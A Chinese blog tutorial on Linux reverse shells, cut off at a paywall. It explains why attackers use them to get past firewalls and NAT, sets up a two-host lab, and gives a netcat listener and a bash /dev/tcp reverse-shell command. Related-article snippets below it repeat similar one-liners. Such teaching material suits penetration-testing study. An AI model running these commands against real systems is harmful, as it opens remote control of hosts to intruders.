Linux反弹Shell的多种技巧

已于 2024-08-19 19:47:38 修改
阅读量1.3k 收藏 29
点赞数 27
CC 4.0 BY-SA版权
分类专栏: 网络安全 #基础技能 Linux 文章标签: linux 网络安全 渗透测试 后渗透
于 2024-08-10 00:14:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36963372/article/details/141073070

Linux反弹Shell的多种技巧

反弹Shell的使用场景

使用反弹Shell(Reverse Shell)的主要原因包括防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况,这些限制使得传统的正向连接(如SSH、Telnet等)难以实现。以下是使用反弹Shell的几个主要原因:

  1. 防火墙限制:目标主机可能位于防火墙之后,该防火墙只允许出站连接而不允许入站连接。在这种情况下,正向连接(攻击者主动连接到目标主机)将无法实现,而反弹Shell允许目标主机主动连接到攻击者监听的端口,从而绕过防火墙限制。
  2. 动态IP地址或网络限制:目标主机的IP地址可能是动态的,或者网络环境经常变化,导致攻击者无法持续通过正向连接进行控制。反弹Shell允许目标主机主动寻找并连接到攻击者的稳定IP地址,确保连接的持续性。
  3. 端口限制:当目标机器的端口被占用或无法直接连接时,反弹Shell可以通过受害者主机主动连接到攻击者的服务端,实现命令执行,解决了端口限制的问题。
  4. 安全策略或软件限制:目标主机可能配置了严格的安全策略或软件(如WAF),这些策略或软件对入站连接进行严格的检测和过滤,但对出站连接的检查可能较少或不存在。通过反弹Shell,攻击者可以绕过这些安全策略或软件的检测。
  5. 目标主机在局域网内:如果目标主机位于局域网内,并且从外网无法直接访问,那么正向连接将无法实现。反弹Shell允许目标主机通过局域网内的路由器或网关主动连接到外网的攻击者,从而实现对目标主机的远程控制。
  6. 目标环境不明确:如果攻击者对被控机器的环境不了解,如对方的网络环境、开关机时间等,使用反弹shell可以建立一个服务端让被攻击主机主动连接,从而不用担心目标机器的状态。

前期准备

这里我们使用主机1作为攻击主机,主机2作为被攻击主机。

  1. 主机1
    操作系统:Ubuntu 24.04
    主机IP:192.168.88.201
    主机名:ctf-1
  2. 主机2
    操作系统:Ubuntu 24.04
    主机IP:192.168.88.202
    主机名:ctf-2
  3. 必要工具安装
# 安装netcat
apt install netcat-traditional

命令 nc -lvnp <端口号> 在 Linux 系统中用于启动一个监听指定端口的 Netcat(nc)服务。Netcat 是一个功能强大的网络工具,用于读写网络连接。这个命令的各个选项意义如下:

-l:监听传入的连接,而不是主动向外发起连接。
-v:详细模式(verbose),显示输入输出信息。有些版本的 Netcat 可能需要 -vv 来获得更详细的输出。
-n:直接使用 IP 地址,不通过域名服务器(DNS)来解析主机名。这可以加快连接速度,特别是在处理大量连接或测试时。
-p <端口号>:指定本地端口号进行监听。<端口号> 应该替换为你想要监听的端口号,比如 4444。

1、使用Bash进行Shell反弹

前提条件:当前用户有权限执行Bash命令。

  1. 在攻击主机上监听准备使用的端口
# 监听5000端口
nc -lvnp 5000

示例如下:
攻击主机监听5000端口

  1. 在目标主机上使用Bash发起反弹Shell连接
# 发起反弹Shell连接
bash -i >& /dev/tcp/192.168.88.201/5000
最低0.47元/天 解锁文章

200万优质内容无限畅学
LinuxN种反弹shell方法
YUGUOHOU的博客
11-26 1万+
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络 概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器 (目标ip:目标机器端口),这是比较
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6706
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell的27种方法 都学会搞定90%的渗透!
最新发布
2401_84578953的博客
07-18 303
根据目标系统的环境和权限,攻击者可以编写自定义的反弹shell脚本。import oshost ='x.x.x.x'# 攻击者IPport =1234# 监听端口将此脚本上传到目标系统并执行,即可建立反弹shell连接。
Linux反弹Shell
m0_73199983的博客
03-06 1619
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
linux反弹shell方法
weixin_53747497的博客
07-12 2416
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
LINUX shell反弹篇(一)
胖虎的博客
10-26 2245
linuxshell反弹的方法及原理
linux-ReverseShellasaService反弹shell即服务
08-13
3. **权限与隐藏**:为了防止被检测到,反弹shell服务可能会采用多种技巧,比如使用非标准端口、隐藏进程、加密通信等。 4. **脚本语言**:Python、Perl、Bash等脚本语言常被用于创建反弹shell,因为它们灵活且易于...
全面掌握Linux提权技巧反弹shell脚本
- 反弹Shell是一种远程访问技术,攻击者通过在目标机器上执行特定命令来创建一个逆向连接。 - 在反弹Shell脚本中,通常需要设置监听端口和IP地址,并将这些信息嵌入到Shell代码中。 - 常见的反弹Shell脚本语言...
Linux安全协议】:防范NC反弹shell变种的策略与技巧
[【Linux安全协议】:防范NC反弹shell变种的策略与技巧](https://www.endace.com/assets/images/learn/packet-capture/Packet-Capture-diagram%203.png) # 摘要 本文从Linux安全协议的概述出发,深入探讨了NC反弹...
渗透测试必备:反弹shell手法详解与实战技巧
本文档提供了一套详细的反弹shell技巧,适用于不同操作系统环境下的实战操作,包括但不限于Linux(bash、nc、awk、telnet等)、Python、PHP、Perl、Ruby、Lua和JAVA等多种编程语言。 在Linux环境下,有多种方法实现...
Linux 反弹 Shell
sankgao 的博客
01-12 788
Linux 反弹 Shell
渗透测试-Linux反弹shell
lza20001103的博客
05-11 3261
Linux反弹shell
Linux系统下反弹shell
若有战,召必回
11-30 3249
之前研究过一段时间的反弹shell,所以本文是我个人对反弹shell的理解,当然,本人才疏学浅,如有啥错的地方,各位师傅指出,共同学习一起进步!!!0x00 定义受害者由于某种原因主动向攻击者发起连接,攻击者可向受害者下发命令并得到命令执行结果,即为反弹shell。某种原因,包括但不限于受害机器运行了远控木马(钓鱼邮件附件),存在RCE漏洞等0x01 本质网络通信+命令执行+重定向方式。
Linux环境下的shell反弹
qq_55213436的博客
07-05 2187
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
Linux反弹shell几种方法学习总结
weixin_34409822的博客
09-04 619
什么是反弹shell? 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建...
Linux反弹shell
weixin_64338385的博客
11-26 2413
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
Linux常用的反弹shell命令
m0_63200360的博客
04-24 3968
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3315
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安心写bug

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值